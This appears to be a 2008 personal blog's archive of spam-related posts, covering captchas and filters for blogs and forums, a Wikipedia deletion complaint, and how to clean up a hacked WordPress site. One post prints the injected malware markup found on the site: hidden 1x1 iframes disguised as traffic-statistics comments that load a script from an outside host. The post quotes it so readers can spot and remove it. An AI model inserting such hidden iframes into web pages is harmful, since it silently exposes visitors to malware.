Posts Tagged ‘spam’

How to keep spam off your blog, bulletin board, or forum

Thursday, July 17th, 2008

Spam: it’s not just for breakfast and email anymore.  Webspam is a huge problem - if you run a blog or a forum, you’re probably familiar with the gobs and gobs of gibberish being posted all over the web by spammers.

This humble blog, which only gets a few hundred visitors per day, has had over 17,000 spam comments since I moved over to WordPress last year.  Having your site inundated with comment spam can be just as big a headache as getting hacked.  No one wants to spend hours every day sorting the good posts from the bad.  I’ve already written about how to totally clear out a spammed forum and erase all traces of its reputation-marring existence, but the best solution is prevention.

Here are some steps you can take to help prevent spam on your blog or forum.

Keeping Spam off Your Blog

This section assumes you’re hosting your own blog and can add plugins and make configuration changes. My examples will be WordPress-heavy because that’s the platform I’m most familiar with.

Option 1:  Close or restrict comments. Most blogs give you some options to restrict who can comment on articles.  In WordPress, you can require that users create accounts to comment under Settings -> General.  This might not help too much, since I’ve seen hundreds of automated user accounts created right alongside the spam.

You can also require that comments are approved before they appear - in WordPress look under Settings -> Discussion.  This will stop your blog from being graffitied without your knowledge but also requires manual effort.  You can also disallow trackbacks and pingbacks, which are really cool in theory but a major avenue for automated spam.

You can also shut down comments completely, or disable comments on old posts.  At that point you may be throwing the baby out with the bathwater, but it’s certainly effective.

Option 2:  Make sure commenters are real people with a captcha. Even if you’re not familiar with the term, you’re familiar with captchas.  They’re the little widgets at the end of a form where you have to decipher some scrambled text from an image.  Many blogs have captcha options built in, but if you’re looking for a captcha plugin be sure to balance usability with security.

I’ve used the Did You Pass Math plugin with some success.  Jeff Atwood has used an extremely simple captcha for years on his high-traffic blog.  Recaptcha is a really cool project that helps fight automatic posting and digitize old books at the same time.
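
To give a feel for how a simple math captcha works, here is a minimal Python sketch. It is not the code behind Did You Pass Math or any other plugin; the names SECRET_KEY, make_challenge, and check_answer are made up for illustration. The idea is that the server asks an easy sum and sends along a signed token for the right answer in a hidden form field, then checks the visitor's answer against that token.

```python
import hashlib
import hmac
import random

# Hypothetical secret; in practice this would live in server-side config.
SECRET_KEY = b"change-me"


def sign(answer: int) -> str:
    """Return an HMAC of the expected answer so it can ride along in a hidden form field."""
    return hmac.new(SECRET_KEY, str(answer).encode(), hashlib.sha256).hexdigest()


def make_challenge(rng: random.Random) -> tuple[str, str]:
    """Build a question such as 'What is 3 + 4?' plus a signed token for the answer."""
    a, b = rng.randint(1, 9), rng.randint(1, 9)
    return f"What is {a} + {b}?", sign(a + b)


def check_answer(submitted: str, token: str) -> bool:
    """Accept the comment only if the submitted text is a number matching the token."""
    try:
        value = int(submitted.strip())
    except ValueError:
        return False
    return hmac.compare_digest(sign(value), token)
```

A sketch this small is easy to beat (there are only a handful of possible answers, and a token can be replayed), so treat it as a speed bump for dumb bots rather than real security.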

Option 3:  Use an automatic filtering system. If you’re using WordPress, I have three words for you:  Akismet, Akismet, Akismet! Seriously, Akismet is so good at automatically marking spammy comments and trackbacks that it’s almost scary.  If you’re not using WordPress, you may still be able to find an Akismet plugin for your blogging platform.  There are other systems worth trying as well, such as Spam Karma, but I have less experience with those.

Keeping Spam off Your Forum

Again, I’m assuming you are hosting the forum yourself or can otherwise make config changes.  I’ll use phpBB (version 3) as an example because I’ve used it in the past.

Option 1:  Restrict user accounts. This can be a tough call, because when you start a forum you want to make it as easy as possible for people to join in the discussion.  Unfortunately, allowing anyone to register and begin posting without any admin approval also opens the door for spammers.

In phpBB this setting can be found in the Administration Control Panel under Board Configuration -> User Registration Settings.

Option 2:  Again with the captchas. Captchas aren’t 100 percent guaranteed to remove spam but they do help.  If your forum software doesn’t have a captcha or a captcha plugin, I would seriously consider upgrading to a version that does or switching forums completely.  I know it’s a huge pain but waking up one morning to find 10,000 spam posts is even worse.

In phpBB3 look under Board Configuration -> User Registration Settings for a setting called “Enable visual confirmation for registrations” and make sure it’s turned on.  You can change the details under Board Configuration -> Visual confirmation settings.

Option 3:  Try to find an automatic filtering system. This is harder than for blogs.  There was an Akismet phpBB mod but it’s apparently not being maintained.  There’s a workaround involving the Spam Words mod that you can read about here.  The Spam Words mod might be worth trying on its own too.  Here’s a thread with more options for phpBB2; search around and find what’s available for your forum software.
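
If you're curious what a word-list filter boils down to, here is a rough Python sketch. It is not the Spam Words mod itself, and the word list and link threshold are assumptions I picked for the example. It flags a post if it contains a listed word or too many links.

```python
import re

# Hypothetical word list; a real one would be tuned to the spam your site actually gets.
SPAM_WORDS = {"viagra", "casino", "payday"}
MAX_LINKS = 2  # assumed threshold, not taken from any particular mod


def looks_like_spam(text: str) -> bool:
    """Flag a post that contains a listed word or more links than MAX_LINKS."""
    words = set(re.findall(r"[a-z0-9']+", text.lower()))
    link_count = len(re.findall(r"https?://", text, flags=re.IGNORECASE))
    return bool(words & SPAM_WORDS) or link_count > MAX_LINKS
```

A filter like this will produce false positives, so it's probably safer to send flagged posts to a moderation queue than to delete them outright.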

Even without automated filtering, you can try to slow down the spammers by setting a time limit between posts (most human beings don’t type as quickly as spambots do).  Other options, such as disallowing links and BBCode, are pretty drastic but might make your forum less enticing to spammers.
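
A time limit between posts is simple enough to sketch in a few lines of Python. This is only an illustration of the idea, not how phpBB implements its flood interval; the FloodControl class and the 30-second default are my own assumptions.

```python
import time
from typing import Optional

MIN_SECONDS_BETWEEN_POSTS = 30  # assumed value; tune for your community


class FloodControl:
    """Remember each user's last accepted post time and reject posts that arrive too soon."""

    def __init__(self, min_interval: float = MIN_SECONDS_BETWEEN_POSTS) -> None:
        self.min_interval = min_interval
        self.last_post: dict[str, float] = {}

    def allow(self, user: str, now: Optional[float] = None) -> bool:
        """Return True and record the post if the user has waited long enough."""
        if now is None:
            now = time.monotonic()
        previous = self.last_post.get(user)
        if previous is not None and now - previous < self.min_interval:
            return False
        self.last_post[user] = now
        return True
```

Note that a rejected post doesn't reset the clock here, so an impatient human only has to wait out the original interval.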

Just for fun:

Spam, spam, bacon, and Spam


The Urge to Deletion: Is Wikipedia making molehills out of mountains?

Tuesday, June 17th, 2008

Wikipedia is great.  Even now, it’s still kind of amazing that such a huge body of knowledge has been organized ad-hoc by volunteers, most of whom have never met in person. Most social software systems would die for this level of collaboration.

That said, has anyone else gone to a random Wikipedia article from, say, search results and ended up a little depressed?  It seems like every other article I find lately has a big warning label at the top - this article contains too much trivia, this article has too many fictional references for an encyclopedic and academic approach to the topic, and worst of all: this article has been marked for deletion.

I understand that it must be very difficult to wrangle all the millions of contributions into a consistently high-quality encyclopedia.  Just dealing with all the spam and abuse must be an enormous undertaking, even when distributed among thousands of good samaritans.  But one of the things that was great about Wikipedia was the breadth of coverage and the depth on some particulars, even if it was excessive to the point of comedy.

But a brief look at the list of articles marked for deletion the last few days illustrates my point.

1. Horse Ranch Mountain. You know there’s something wrong when a mountain doesn’t meet the notability requirement.   Here’s the comment opening the deletion on the talk page:

In what way is Horse Ranch Mountain notable? I am quite familiar with the area, and I cannot think of any way in which it is notable. Please convince me otherwise.

I would think it’s notable because it is a mass of millions of tons of rock and earth sticking out of the ground.  On a less sarcastic note, I’m sure I’m not the only one who’s looked at a map, spotted a feature I’ve never heard of, then looked it up online.  Even if it’s not accessible it’s probably helpful to have a reference noting that it’s the highest point in Zion, measured at X meters tall, etc.

2.  List of redundant expressions. I understand the argument that an encyclopedia is not a trivia game or a book of lists, but these sorts of pages used to be one of my favorite features of Wikipedia.  Exhaustive lists of palindromes, English words of Polish origin, etc., give examples, context, and can help connect concepts in language.  Also, the use or omission of redundancy is an important stylistic consideration when writing - it can be used for everything from emphasis to characterization.

3.  Hindu literature. Delete the article on Hindu literature?  Granted, the article needs work.  But isn’t it worrying how the marked for deletion pages are filled with subject matter from outside the U.S. and maybe Europe?

I know the standard answer to complaints like these is that if you feel so strongly, you should participate in the debates and push for things not to be deleted.  Judging by the talk pages I wonder if I would be drowned out by all the “I’m a history major and this is a programming term, never heard of it, not notable” comments.  I’ll admit my contribution to Wikipedia is limited to random spelling and grammar corrections that were obvious enough that even I noticed them, so I could be wrong.  I just feel like some of what made Wikipedia so addictive is slowly being drained away.

Agree?  Think I’m wrong?  Leave me a comment below.  See, it’s kind of like a talk page, but even with consensus you can’t edit my article.   Until the next Wordpress exploit comes out.


Fixing a ‘This site may harm your computer’ warning, part 3: Clearing a spammed forum

Saturday, March 22nd, 2008

Earlier I wrote about the steps you should take if your site has been hacked and is being slapped with a “This site may harm your computer” label. In that post we covered some of the sneaky ways scammers will insert text into your posts on WordPress and other blog software.

But what if it’s even worse? Let’s say you installed a forum like phpBB to play around with but haven’t been keeping up with security updates. Or, even worse, your ftp account has been compromised and spammers have installed their own bulletin board or other content in a subfolder or subdomain. You don’t want Google and Yahoo thinking you are a spammer, so what do you do?

In that worst-case scenario, you’ll first need to change your passwords and make sure you have control of any and all ftp accounts, telnet accounts, etc. You may need to work with your host to make sure everything is locked down. Web server security is a big topic in its own right, so from here on out we’ll assume you’ve already got that covered.

Step 1 - Delete the spam!

The first thing to do is delete the spammy bulletin board. Go ahead and delete all the contents of the directory. Don’t delete the directory itself quite yet. This does two things - it stops the spammers from getting any benefit from wayward visitors to your site and it causes your web server to start serving 404s (not found) to search engine spiders.

You can go one step further and explicitly tell browsers and spiders that this stuff is gone forever by serving a 410 (gone). You can do this with any server-side language; my example will be in PHP. Create a new index.php file in your formerly-spammed directory that looks like this:

<?php header("HTTP/1.1 410 Gone");
header("Status: 410 Gone");?>

This will cover the main directory and then you can use mod_rewrite to redirect all the deleted pages to your 410 file.
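
Since any server-side language will do, here is the same idea as a minimal Python WSGI sketch. It is not a mod_rewrite rule and not a drop-in replacement for the PHP file above; GONE_PREFIX is a hypothetical path standing in for wherever your deleted forum lived. Everything under that path gets a 410, so you don't need one file per deleted page.

```python
GONE_PREFIX = "/forum/"  # hypothetical path of the deleted forum


def app(environ, start_response):
    """Answer 410 Gone for the deleted directory and 404 for anything else."""
    path = environ.get("PATH_INFO", "")
    if path.startswith(GONE_PREFIX):
        start_response("410 Gone", [("Content-Type", "text/plain")])
        return [b"This content has been permanently removed.\n"]
    start_response("404 Not Found", [("Content-Type", "text/plain")])
    return [b"Not found.\n"]
```

To try it locally you could hand app to wsgiref.simple_server.make_server from the standard library and request a few old forum URLs.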

Step 2 - Update your robots.txt

At this point search engine spiders will be able to figure out that the pages should be removed from their indexes, but only one page at a time as they re-crawl your site. You want it out of there ASAP, so create a robots.txt entry to tell spiders to stay away from the whole directory. It should look something like this:

User-agent: *
Disallow: /forum/

If the spam was in a subdomain, you’ll need to make sure you have a robots.txt file in the root directory of the subdomain that disallows the whole thing:

User-agent: *
Disallow: /
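
Before you move on, it can't hurt to double-check that your robots.txt blocks what you think it blocks. Here is a small Python sketch using the standard library's urllib.robotparser; the is_blocked helper and the example.com URLs are just for illustration.

```python
from urllib.robotparser import RobotFileParser


def is_blocked(robots_txt: str, url: str, agent: str = "*") -> bool:
    """Return True if the given robots.txt text tells the agent not to fetch the URL."""
    parser = RobotFileParser()
    parser.parse(robots_txt.splitlines())
    return not parser.can_fetch(agent, url)


# The same rules as the subdirectory example above.
ROBOTS = "User-agent: *\nDisallow: /forum/\n"
```

Calling is_blocked(ROBOTS, "http://example.com/forum/viewtopic.php?t=1") should report the forum URL as blocked, while a URL elsewhere on the site should not be.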

Step 3 - Tell Google about the spam

Log in to Google Webmaster Tools and look under Tools -> Remove URLs.  Create a new removal request for the subdirectory or subdomain you’ve cleaned.  This might seem a little redundant, since you’ve already done two steps that will let search engines know you’re no longer serving up spam.  But it’s worth being as explicit as possible to get your site’s reputation cleared as quickly as possible.

Bonus tip:  Subdomains and Google Webmaster Tools

If your spammed forum was in a subdomain, let’s say http://forum.example.com, you’ll need to add the subdomain as a new site in Google Webmaster Tools.  You’ll need to go through the site verification process for the subdomain, too - it won’t verify automatically like it would if you had added a subdirectory as a new site.

By the way, if you’d like some more tips about keeping your site clean and tidy, check out this great post on the Google Webmaster Central Blog.

Any questions? Comments?  Tips that I’ve missed?  Please post in the comments section below.


Fixing a ‘This site may harm your computer’ warning, part 2: Hidden iFrames

Thursday, March 6th, 2008

Earlier I wrote about what I did when my Wordpress blog started returning a “This site may harm your computer” warning in Google and Firefox. Just to recap, these are the first steps to take to fix the problem:

  1. Plug the hole - update Wordpress (or your blog, forum, or CMS software) to plug any security holes.
  2. Repair the damage - search for spammy outgoing links or malware files on your pages and delete them.
  3. Clear your good name - request a review by StopBadware.org and in Google Webmaster Tools.

This is the right process to follow, but it turns out that I was a bit premature in doing step 3. Spammers and spyware spreaders are a wily, unpredictable bunch and they can’t be expected to stick to simple tactics like inserting links into posts.

The other tactic they used on my site was inserting invisible iFrames. These are harder to find because there aren’t as many automated tools to find them (or, at least, I don’t know of any) so it takes some manual searching through your source code. Here’s what the malware code looked like:


<!-- Traffic Statistics --> <iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics -->

<noscript></noscript> <iframe src="http://61.132.75.71/iframe/wp-stats.php" frameborder="0" height="1" width="1"></iframe><br />
<!-- End Traffic Statistics -->

It looks like others have run into the same issue. Your anti-virus software may even give you a warning about a virus in a file named “wp-stats[1].htm.” In my case AVG Antivirus warned me about a trojan horse in my temp folder.
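
I don't know of a ready-made tool for this, but a rough scanner is not hard to sketch. The Python below uses the standard library's html.parser to list iframes that are only 0 or 1 pixel wide or tall, which is what the malware on my site looked like. The class and function names are my own, and it only catches this one trick: an iframe hidden with CSS would slip right past it.

```python
from html.parser import HTMLParser


class HiddenIframeFinder(HTMLParser):
    """Collect the src of every iframe whose width or height is 0 or 1 pixel."""

    def __init__(self) -> None:
        super().__init__()
        self.suspicious: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        attributes = dict(attrs)
        sizes = (attributes.get("width"), attributes.get("height"))
        if any(size in ("0", "1") for size in sizes):
            self.suspicious.append(attributes.get("src") or "")


def find_hidden_iframes(html: str) -> list[str]:
    """Return the src values of tiny iframes found in the given HTML source."""
    finder = HiddenIframeFinder()
    finder.feed(html)
    return finder.suspicious
```

You would feed it the saved source of each page or template and then look by hand at anything it reports.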

Once I removed the iframes, I resubmitted my request in Google Webmaster Tools. Here’s another helpful hint that took me a while to figure out: If only part of your site has been hacked and is marked in StopBadware.org’s database, you should add that subdirectory as a new site in Webmaster Tools. Here’s an illustration:

[Screenshot: webmaster-tools-subdir]

In this screenshot you can see my main site, www.jasonmorrison.net. If I click there I don’t see any warning about spam or viruses in my blog at www.jasonmorrison.net/content. So I just added my blog as a new “site” and there I could see the warnings and make a reconsideration request.

One last thing: Google may send out an email to try to let you know about these sorts of problems. I never saw these emails, though, since they go to addresses like abuse@yourdomain.com and admin@yourdomain.com that spammers also like to use. They ended up in my spam bucket. So you might want to whitelist email from google.com.

Next in part three I’ll talk about what to do when a whole subdomain (perhaps with a forum) is filled with spam. Please put questions or additional suggestions in the comments below.


What I did when my site showed up as a bad link

Wednesday, February 27th, 2008

This site is just a humble blog where I write a bit about programming, design, usability, and other topics I’m interested in. It’s nice that I get some readership and a few good comments now and again but I don’t have any real financial stake here, and I’m definitely not interested in trying to spam anyone, send them spyware, etc. So imagine my shock when I noticed that my blog comes up with a warning, “This site may harm your computer.”

This comes up in various places including Firefox 3 and Google searches.  Obviously no one is going to follow a link to my site with such a disclaimer. So where did it come from and what did I do to clear my site’s good name?

The disclaimer comes from the findings of StopBadware.org, an effort that I had heard about in the past but hadn’t really looked into. It sounds like a great idea - it’s very difficult for users to investigate every single link they might click on, and some spyware and adware is hard to see before it’s too late. So StopBadware.org is a sort of neighborhood watch for the web.

How did my site end up on the list? There are a number of possibilities, so the first step is to check StopBadware.org to see what they found. Follow this link to search for your URL. Make sure you search for your root domain, in my case jasonmorrison.net. Some subdomains or directories might show up with a report while others are still considered clean. This confused me for a while.

Once you see the details there it’s time to hunt for problems. If you have anything more than a simple, static site this can be more difficult than it might first seem. My site uses WordPress and allows user comments. A bad link could show up in a comment, or someone may have hacked the site using a known vulnerability. It looks like it was the latter in my case, but I’m getting ahead of myself. How do you find the bad link?

There are lots of tools to find incoming links to your site, but I’ve only found one so far that checks outgoing links, at Bad Neighborhood. Don’t blindly rely on this tool, but follow up on any links that you don’t recognize having put there yourself. I found a link in the middle of a post from a month or so ago to some spammy German site.
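
If you'd rather check outgoing links yourself, here is a rough Python sketch of the idea. It has nothing to do with how the Bad Neighborhood tool works; the names are made up, and it only looks at plain anchor tags. You give it a page's HTML and the set of hosts you know you link to, and it returns every other host the page points at.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class LinkCollector(HTMLParser):
    """Gather the href of every anchor tag in a page."""

    def __init__(self) -> None:
        super().__init__()
        self.hrefs: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            href = dict(attrs).get("href")
            if href:
                self.hrefs.append(href)


def unfamiliar_hosts(html: str, known_hosts: set[str]) -> set[str]:
    """Return hosts linked from the page that are not in the known_hosts set."""
    collector = LinkCollector()
    collector.feed(html)
    hosts = {urlparse(href).hostname for href in collector.hrefs}
    return {host for host in hosts if host and host not in known_hosts}
```

Relative links have no host and are skipped, so what comes back is a short list of external sites to eyeball for anything you don't remember linking to.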

How did the link get there? I don’t think my site was hacked wholesale (or if it was, they were very subtle about it). More likely someone took advantage of my laziness in upgrading WordPress and used a known security exploit.

Now that we’ve found and removed the offending link and plugged any known security holes, it’s time to try to get the stigma removed. Follow the link to the StopBadware.org request for review page and fill out a request. If the badware report came from one of their partners, you may have to follow up with them as well. I’m still waiting to hear back on my review; I’ll post an update when I know more.

Hopefully this has been helpful. Let me know if you have any questions or suggestions in the comments below.
